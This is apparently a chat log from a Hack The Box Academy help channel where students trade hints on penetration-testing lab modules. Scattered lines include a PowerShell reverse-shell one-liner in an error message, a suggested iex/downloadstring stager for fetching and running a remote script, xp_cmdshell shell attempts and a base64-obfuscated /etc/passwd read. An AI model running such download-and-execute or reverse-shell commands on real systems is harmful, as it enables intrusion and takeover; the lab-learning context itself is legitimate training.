If you tell me the module and the section, maybe I can help you and give you a hint how I solved it.
ahhhh damn it, i know whats up. I read /typed something wrong
All is good, thanks guys! #needmorecoffee
Hey guys how do you deal with burnout and excessive learning?
hey guys, im currently doing "getting started" module, is anyone available for quick question?
This is one of the best modules in the platform!!
Big Thanks to the ones who created it: @blissful verge and @LTNB0B
maybe i can help
can I DM you?
ye
```
┌─[httpd@parrot]─[~/Downloads]
└──╼ $ sudo apt install freerdp2-shadow-x11
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:
The following packages have unmet dependencies:
 libfreerdp2-2 : Depends: libwinpr2-2 (= 2.3.0+dfsg1-2+deb11u1) but 2.10.0+dfsg1-1~bpo11+1 is to be installed
 libwinpr-tools2-2 : Depends: libwinpr2-2 (= 2.3.0+dfsg1-2+deb11u1) but 2.10.0+dfsg1-1~bpo11+1 is to be installed
E: Unable to correct problems, you have held broken packages.
```
damn it. Trying to get xfreerdp working
sudo apt-get install aptitude
sudo aptitude install freerdp2-x11
https://www.reddit.com/r/debian/comments/vcpcpe/cant_install_freerdp_neither_freerdp2x11/
That worked instantly
Thanks man
been fiddling with this for like half an hour
what makes aptitude work ? What's the theory behind this?
I do not know exactly, but maybe that helps
https://wiki.debian.org/Aptitude
You never ran openssl with sudo
hi, can I dm you for some help with this module?
i found other way to get a flag, did u solve it tho?
Any luck? Stuck here. Was able to make it through the first time and access the fatty-client-new, but after resetting the box no luck...
https://academy.hackthebox.com/module/113/section/2164
Linux Local Privilege Escalation - Skills Assessment. I dont know what to do to get flag3. can someone give a nudge?
I am working through the socat redirection with a reverse shell section of the pivoting tunneling and port forwarding module. What is the best way to get the payload onto the target host(internal windows machine) for this? I used a dynamic port forward and log in via rdp with proxychains, to then use powershell to download the payload to the target, after I moved the payload to the pivot host with scp. I am sure that there are many ways to do this but I am wondering what everyone's preferred way, or what the best way might be?
inb4 madf0x says ligolo-ng
unintended way :3
I could really use a nudge for AD Enumeration & Attacks - Skills Assessment Part II Q7: Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host. I managed to get a shell on the SQL01 machine, but the Administrator user doesn't seem to have a Desktop folder. I tried moving mimikatz to the machine, but it won't fire.... Running low on ideas here 
"C:\Users\Administrator\Desktop\flag.txt" in SQL01
Can I DM you to avoid too many spoilers here?
https://academy.hackthebox.com/achievement/89408/182 if u dont believe me
where is the help chat?
Green bubble bottom right
https://help.hackthebox.com/en/articles/5987511-contacting-academy-support
bro I trust you. I was just saying i did it unintended way lol
mind if i ask you how?
how come sometimes you have to do apt-get and other times it's just apt install
old conventions vs new conventions
Simply said, you can use both
ok thanks
any reason i cant see ftp running in the attacking ftp section of attacking common services?
might not be running on default port
I remember having issues with that one, had to bounce it a couple of times
also i know what the user is but no matter what i use to crack the password i cant get in
I've tried crackmapexec for smb, hydra for ftp and ssh, as well as medusa
then you haven't found the right vector yet
wdym by vector?
attack vector
well yes
im using the lists in the module
you do need hydra at some point. but you need more info before
i understand ftp isnt on the default port
and u need to add that
but other than that idk what i could be missing
well I'm pretty sure any list you have doesn't contain the password
keep in mind, they always try to showcase everything they taught
In the Pivoting, Tunneling, Port Forwarding module, Socat bind shell: I am not sure how to troubleshoot this issue with my handler, any ideas?
not sure, but I doubt socat can handle a meterpreter session
lemme check
Check LHOST
ignore my comment on socat handling meterpreter, didn't quite understand how it was supposed to work. instead it looks like the meterpreter payload that you executed on the windows host is broken. how'd you generate that?
There is no LHOST in the payload options
and I have not executed a payload yet, I am just attempting to start the multihandler
You set a LPORT but no LHOST?
it might figure out the interface itself given the RHOST I guess?
these are the options
How often will I ever use this bind shell anyway? I remember the TCM course said that he has only used a bind shell like one time on an engagement. Do you ever use it for the rest of the course/exam?
I see people saying in the discord if I search this section that they just only use reverse shell
my theory as to what's going on (it's been a while, so not sure on this):
you need to execute the windows payload first, so that it listens on port 8443.
Then socat
Then multihandler
Right now multihandler sends the stage to the windows host but the windows host hasn't opened a port yet (cause no payload executed). Therefore returns connection refused which isn't a valid meterpreter session ofc
personally, I haven't ever used bind shells unless specifically asked to by a module. but I suppose they exist for a reason
bind shells are mostly for historical knowledge purposes
or long term persistence on a jump host that is utterly blind.
๐
used to be a time where firewalls were not very prevalent and people didn't really track connections, and using a proxy was already considered advanced stealth, so there was a lot of emphasis on scrubbing IP from logs and records for stealth. In those days you'd want to have a bind shell cause you could connect to it from anywhere and just not log the connection. If you used a reverse shell your IP would have to be built in somewhere and thus could expose you.
that makes a lot of sense, thanks for the clarification
As inbound firewalls and the ease of setting up a hosting server became more common, reverse shells rose up to be the dominant stealth strategy instead and became the de facto standard
i just experienced some problems with connection of my VM to openvpn, is there a problem ?
seasonal challenge
You should ask here #1080884182336675872
If you do not have access, then read #welcome
This isn't the place to ask #1080884182336675872 : if you can't see it follow instructions in #welcome
thanks a lot
thanks a lot
Hello ! I'm stuck in the password attack module again in the hard lab. I have mounted the vhd file and i'd like to know how to crack the passphrase ? any hint pls ?
There is a x2john that lets you pass it off to john
yes i tried this, with the mutated list and i found nothing
Try a different list
Perhaps it uses a weak password that can be cracked using a simpler list from seclists
Did Microsoft ever patch the "vulnerability" allowing Printspoofer to work? The way I understand it is the "vulnerability" is actually just how SeImpersonate privileged accounts are intended to operate, therefore there won't actually be a patch for Printspoofer, just a CVE explaining it. I'm guessing Windows created a security patch in order to recognize the code used to exploit this privilege. Is this true? Am I on the right track here?
What module is this for?
Attacking Enterprise Networks. I'm working on the reporting aspect.
Not finding anything concrete on google. That's why I'm asking here.
idr exactly but it isnt totally unusual for there to be a vulnerability with a process and get a CVE but the only patch is at most making it not default behavior
another hint ? 
oups, ok
Is it risky to connect to the HTB instance via SSH from my personal operating system?
you mean via the vpn?
No, I mean just using SSH from the terminal of my pc
No need for vpn to connect via ssh, as the instances have public ip
okay well its safe because you cant
I mean, I do it all the time
ah the docker instances?
Yes
Is there a real reason or you just use it cause you feel safer?
What could be compromised?
I'm a newbie, 2nd day basically, & stuck in the module Linux FUNDAMENTALS with 0/1 instances left but it is stuck on waiting to start; I can't get it to close the instance machine. who do I ask for help? It is still saying Waiting to start... after 3 hours
Don't bother with that, the instance will close itself automatically after some time
Okay, TY!
Hi, I am doing the module : Windows Attacks & Defense section : Print Spooler & NTLM Relaying.
In this section we use impacket-ntlmrelayx that exploits Zerologon but the course doesn't explain why it is necessary. Can someone explain pls ? :3
Thx
cause it's objectively safer to be using a VM than to not.
I wouldn't worry about it too much though
It's an isolated environment, so of course the safety would be greater or equal, but I was asking why? What am I risking if I use my main system to connect to it? Cause I have sat there and thought about it, there is not much anyone could do to my system anyway, is there? I might be wrong, but I think even HTB staff/sysadmins who manage those instances couldn't do much at all even if they wanted, let alone other potential malicious users
its your gamble
its generally ill advised to be using your host for any sort of hacking tasks
its probably fine, you do you
i found the password of the vhd file in the lab hard password attack module, i tried to open it with guestmount but i think it doesn't work because i use wsl? any help
I have no choice
true
have you tried asking your question before pinging admin and sr. moderator?
i want an article about how to be Staff
ok thx you man
try with other pivot tools then
or other scanning tools
ping sweeps are also usually best to do from the end host you have access to though
cause most tunnels cant proxy icmp
you can always try a connect scan sweep with nmap though. Or crackmapexec if you suspect windows hosts
basically you just need to try more things
Upload a statically compiled nmap binary to the jump box and scan from there
Oh wait madfox said that
is this normal? 
Hi, I am stuck in the module attack to common servers in the DNS part I do not understand what you want me to do and the truth is that I am very stuck if someone can help me.
The !root means you can't run it as root
But you could run it as any other user on the box
wasnt one of my suggestions but yup totally viable as well
You said sweep with nmap so I thought that's what you implied
https://academy.hackthebox.com/module/51/section/1590 Linux Privilege Escalation -- sudo -- just to ask, am I supposed to get root given the PoC they provide in the section?
because the target machine has neither gcc nor unzip, ||the machine is an ubuntu 20.04, which is exploitable with that script||
ah yeah I meant like connect scan. Can do a sweep of say just port 80 and determine if hosts are up or down based on the responses.
not perfect but another tool in the belt
You don't have to compile anything. Look further down in the module. There is another possibility
I haven't done the module in a while, but nc -z with a for loop works, in a pinch.
yea i got it
I did it with other exploit now trying the sudo bypass, I am able to run ncdu as root, but not to get a root shell
after learning the web requests module will i be able to do anything
can i do labs i mean
Hello guys.
Could anyone please help me understand what this question is asking for:
Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain.
It is in Footprinting/DNS section https://academy.hackthebox.com/module/112/section/1069
Do they want us to find the fqdn of the nameserver?
I did go over some of the past comments about this question, but I am still having a hard time figuring out what exactly they are asking for.
Thanks!
Yes, the question is confusing.
Yes, it is about the FQDN from the name server
Gotcha.
Thanks for the clarification!
where the best place yall think i should start coding ?
the #welcome channel
I used to utilize a page to train coding
is the expression used to use correct? lol
I was able to find the solution but i had a follow-up question.
shouldn't the dig cmd work if we used the fqdn of the nameserver instead of the ip provided after the @ symbol?
I also used this one https://www.codewars.com/
htb is not an approved TLD. Therefore, you must specify an authoritative server.
ohhhhh.
Thanks again for clarifying the issue.
Thankkssssss mannnnnn
hey can i ask a question
if my ip address was leaked is it a big problem and how do i know if its leaked if anyone knows please tell me
depends, you likely dont. and also off topic for this channel
alr thank you

bro i got in a bad situation
u use vpn or without
I can give u some pages to check
that would be great
ah shit it says your location may be exposed
thats normal
but is it a problem like can it do any damage other than see my location
im doing an account
just copy ur ip
and paste it in google
if there is any info about ur ip 
but yea just verify ur account and ask in the proper channel
Can we please stay on topic otherwise I'll just hand out mutes.
ty
module: command injection
section: Advanced command obfuscation
Does anyone know why they are grepping for "33" in the following command?
echo -n 'cat /etc/passwd | grep 33' | base64
www-data default user ID
its really not important, do whatever you'd like instead basically
clear cookies and refresh the page and then of nothing contact support
Can someone help on AD Enumeration & Attacks - Skills Assessment Part II Q7: Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host. I am logged in with xp_cmdshell enabled and I have tried many times to get a powershell shell but no results. i know there is a PE technique after getting a shell, but I need the shell in the first place
I used one from revshells.com
i get such errors
```
[-] ERROR(SQL01\SQLEXPRESS): Line 1: Incorrect syntax near '10.10'.
[-] ERROR(SQL01\SQLEXPRESS): Line 1: Incorrect syntax near 'nop'.
[-] ERROR(SQL01\SQLEXPRESS): Line 1: The identifier that starts with '$client = New-Object System.Net.Sockets.TCPClient('10.10.15.35',445);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0' is too long. Maximum length is 128.
```
what shell are you trying to use?
powershell
are you sending a reverse shell back to your machine or the Parrot box?
to my machine
I had to send it back to the Parrot box.
Are you referring to pwnbox or is it a box that you jump to in that assessment
Its the attackbox they give you, not quite the same as a pwnbox
Yeah I would imagine its pretty much the same, but I just ssh into it, no gui
YmFzZTY0IGlzIHlvdXIgZnJpZW5k
Just use a powershell stager for it.
Something like:
powershell -c iex(new-object net.webclient).downloadstring('http://127.0.0.1/shell.ps1')
Then just host the rest of the code in shell.ps1, so you don't bump up against the character limit.
module: Command Injection
Section: Advanced command obfuscation
Find the output of the following command using one of the techniques you learned in this section: find /usr/share/ | grep root | grep mysql | tail -n 1
I cant seem to find the solution to this - anyone able to give me a nudge on this?
VW5mb3J0dW5hdGVseSBkaWRuJ3Qgd29yayAgYXMgd2VsbA==
Linux Privilege Escalation -- Skills Assessment
someone for sanity check?
Ive got 8 minutes
doesn't not seem to be working as well
```
SQL> xp_cmdshell powershell -c iex(new-object net.webclient).downloadstring('http://10.10.15.35/shell.ps1')
[-] ERROR(SQL01\SQLEXPRESS): Line 1: Incorrect syntax near '/'.
SQL> xp_cmdshell powershell -c iex(new-object net.webclient).downloadstring('http://10.10.15.35//shell.ps1')
[-] ERROR(SQL01\SQLEXPRESS): Line 1: Incorrect syntax near '/'.
SQL> xp_cmdshell powershell -c iex(new-object net.webclient).downloadstring('http:%2F%2F10.10.15.35%2Fshell.ps1')
[-] ERROR(SQL01\SQLEXPRESS): Line 1: Incorrect syntax near '%'.
```
Can someone help me with Linux PrivEsc module kernel exploit? Running the exploit shows : version `GLIBC_2.34' not found
it isnt 2.34
iirc it really doesn't like single quotes, there's a way to encode powershell commands though
hmm but that's what pops up when i ran the exploit. And it says use the same exploit..
my bad i thought you were on another question
To be more specific, C programs compiled on glibc 2.34 aren't entirely backwards compatible. There should be a copy of gcc on the remote machine you can use instead
just copy the exploit
compile it and run it
that feeling 
nvm, i got it. Thanks @zinc marsh
Y'all ever redo an entire module? I'm thinking of redoing the binary exploitation module. I dunno if I'm just stupid or bad at learning.
I went back and reread and practiced some of the NMAP stuff again. I thought I had a good deal of experience having completed the Offensive Pentesting path on Tryhackme, but I realized that HTB Academy had significantly more information and techniques compared to what I've been used to using.
I was told coming here from Tryhackme that the main complaint was the "wall of text" each module was comprised of, but to be honest that works for me, it just means taking notes and redoing some sections to reinforce it. Overall I think it's a great way of learning!
Better than not having any detail and a "read the entire man page" approach that THM pushes.
What works for me is taking notes in detail on what I'm reading, but then also taking key points from those notes and putting them in a cheatsheet.
I doubt you're stupid or bad at learning, what matters is you're putting in the effort
did you get it figured out?
tbh im finding the same thing, i learned a lot of this ages ago through a variety of different sources, just finished my degree, now trying to push myself a lot more but im finding most of the modules i've touched on so far im already familiar with but will randomly get a few pages on things i haven't done before
like i've used sql injection plenty of times, after doing the module finding a bunch of other ways i could have been utilizing it
Seriously, I'm doing the SMB footprinting module right now, and it's almost sickening how much of this was left out of my previous THM experience!
yeah htb fills in a lot of holes
so i never actually touched THM since a lot of the concepts i already was familiar with i learned off hackforums years ago, but basically only learned the basics of things
then followed up with an it degree
now im going through modules i know probably 75-80% of and finding so many tricks
I'm just about there too.
has anyone completed this module ?
You can encode your command using Base64 and then decode it using the base64 command in bash, it's all in the module, read the Encoded Commands section carefully.
been working on this for probably 5 hours - let me retry that but i'm pretty sure i've already attempted this with no luck
yeah no luck
nice we are close
DM
I have two opinions on this.
- walls of text just come with the territory of hacking. Digging through unfamiliar documentation is an inevitability and as a hacker you need to be comfortable parsing relevant information out of large chunks of text.
- Complaints about walls of text just often feel like people trying to make excuses for why they're not ready to take the plunge into the deep end.
Yeah, what I was saying is that I prefer the walls of text compared to the very basic information provided by THM.
Yup, I'm just engaging in classic HTB shitting on the thm wannabes
It definitely helps with note-taking
Don't get me wrong, THM was okay, but I feel like I wasted time and should have started here.
THM is good for building up confidence. Sometimes it builds up false confidence though.
Have you figured this one out? I seem to be running into the same issue. I have potential working extensions and have tried them all, but something is missing. Do you mind sharing a nudge in the direction that may have helped you solve it?
nope, this is a module above tier 0
Not always the first, nor the second result of the fuzzed extensions would let you use it in your favor to execute php code on the server
got the flag with file read for escaping restricted shells in the Linux PrivEsc module, any hints for spawning a fully functional shell are greatly appreciated
can anyone assist me on this module? i've got command execution on the target, but when i submit the answer it always says wrong answer :/
DM me
ng is not a word
It's a Chinese surname but not a normal word.
Tbf thm is more diverse and "free" but more "childish" and newbie-friendly.
Rlly depends which one u vibing w
How do I grep the word with inlanefreight in it?
Like
only have test1.inlanefreight.htb, admin.inlanefreight.htb and so on?
have you tried with using awk?
yeah you could use some funky regex but just piping to awk would be easier
Never felt like so much of a noob in all of my time in infosec, but I cannot for the life of me find the right file path for the 'public exploits' section of the getting started module, and a nudge would be greatly appreciated!
Tried: ||/simple-backup, /root/public_html/wp-admin/simple-backup/tools.php, /root/public_html/wp-admin/simple-backup/flag.txt, /root/wp-admin....||
I know the exploit works, as I got /etc/passwd as a POC
Ah, nevermind, I found it by slamming my head into the metaphorical wall. Not sure why that was the right path
the file and its filepath are mentioned in the question
I knew the file, it was the path that was throwing me
It said it was in ||the simple-backup directory in the root wordpress directory||
Oh, it was literally written down 
This is what I get for rushing and just reading the site

Attacking common applications:
Perform manual enumeration to discover another installed plugin. Submit the plugin name as the answer (3 words).
Enumerate the host and find a flag.txt flag in an accessible directory.
I tried gobuster to fuzz the dirs for flag.txt but none, manually going through the directories didn't work either.
I've tried every plugin name i could find (dir listing, source main page) but none worked or fit the description of 3 words.
Anyone a helping hand for me?
fuzz http://blog.inlanefreight.local/wp-content/plugins/ + look for readmes
Thanks!
Hi experts
i hope everyone is doing well.
I want to ask about vulnhub. I am solving machines every day; they are easier than the hackthebox easy level machines. I tried hackthebox machines but they are hard for me, I guess I am missing something in my knowledge when I get stuck anywhere.
I just want to start hackthebox machines, but before this I want to reach some intermediate level.
Is it ok?
any tip or advice?
most welcome
@wise vault start easy machines on hackthebox
Hi I am new here and can someone can help me in private message ?
@dusky violet dm me
are you sure? these machines are friendly with beginners
you mean easy machines like those which became old on hackthebox, like blue, lame? and i should start from the last, then today's machines
@wise vault yes
thank you buddy.
No problem
and what about bug bounty
@wise vault you can do some modules on academy hackthebox for bug bounty
i am learning from owasp broken web app but there is no videos to follow ?
noted
i saw your profile on hackthebox
@wise vault yes I normally use hackthebox
What y'all think the next HTB certification path will be. I hope it's focused on binary exploitation
Based on the published modules, I am thinking:
Blue Team Certificate
Advanced CBBH
Advanced CPTS
Darn. Makes sense. But darn. Htb doesn't have much on binary exploitation. I think only one module.
Intro to Assembly Language
Game Hacking Fundamentals
and two BOF Modules as well
I didnโt see game hacking. Iโll do that
actually 4
Huh. I gotta dig through and find the rest.
I think blue team Certificate
Yes, that is quite possible. But I think that more modules will be necessary for an exam.
yess for sure, but I hope to see more offensive stuff
Two more modules have been announced. Indirectly at least
abt what ?
eeem I didn't see that
ty
nslookup -type=txt example.com
I think that is one of the basic commands you'd get to see in the "cheat sheet" if you just take a look at it, it can be useful and save loads of time
I was using the command but I forgot to remove the -type=txt parameter
Hhehe
Please delete this image, it contains a flag
SOrry
bro don't spoil on other students
You have queried the wrong domain
aaaa
Ok
Thanks
I made a script to scan all the zones
But
I am pretty sure the domain i posted was the right one
It is the only one that contains a flag
inlanefreight.com or inlanefreight.htb?
Subdomain is not equal to zone
I have completed the module but to this day I'm not sure how exactly I would tell the two apart. Is there a clear indication for it or just trial and error?